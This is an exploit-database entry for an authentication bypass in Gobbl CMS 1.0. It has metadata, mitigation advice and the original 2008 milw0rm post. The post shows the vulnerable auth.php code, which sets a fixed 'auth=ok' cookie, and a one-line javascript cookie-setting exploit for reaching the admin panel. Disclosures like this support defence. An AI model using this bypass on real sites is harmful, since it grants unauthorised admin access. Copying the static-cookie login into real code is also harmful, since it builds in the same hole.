Gobbl Cms 1.0 I.Cookie Hand.

vendor:

Gobbl CMS

by:

x0r

5.5

CVSS

MEDIUM

Cookie Handling

119

CWE

Product Name: Gobbl CMS

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

Gobbl Cms 1.0 I.Cookie Hand.

The 'auth.php' file in Gobbl CMS 1.0 does not properly validate user input, allowing an attacker to set the 'auth' cookie to 'ok' and gain unauthorized access to the admin panel. The exploit involves using a JavaScript code to set the cookie and then accessing the 'menu.php' file in the admin directory.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and authentication mechanisms in the 'auth.php' file. Additionally, the use of secure cookies and session management techniques can help prevent unauthorized access.

Source

Exploit-DB raw data:

---------------------------
Gobbl Cms 1.0 I.Cookie Hand.
---------------------------
Autore: x0r ( Evolution Team)
Email: andry2000@hotmail.it
Demo Site:http://www.gobbl.net/
---------------------------
 
Bug In: \admin\auth.php  
 
?>
include ('../config.php');
 
$user = $_POST['user'];
$pass = $_POST['pass'];
 
if ( ($user == $un) and ($pass == $pw) )
{
setcookie( "auth", "ok", time()+40000 ); # Bugz
header ( "location:add.php" ); exit ();
}
else
{
header ( "location:index.php" ); exit ();
}
?>
 
Il file auth.php controlla se nel file ../config.php le post $user\$pass presentano gli stessi dati delle variabili
$un\$pw ( config.php ) se cosÃ¬ Ã¨ setta il cookie auth=ok :P ^ ^
 
Exploit:  
 
javascript:document.cookie = "auth=ok; path=/"; then \admin\menu.php # So Easy To Hack :P
 
Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua GiÃ¹...Ti AmO

# milw0rm.com [2008-12-18]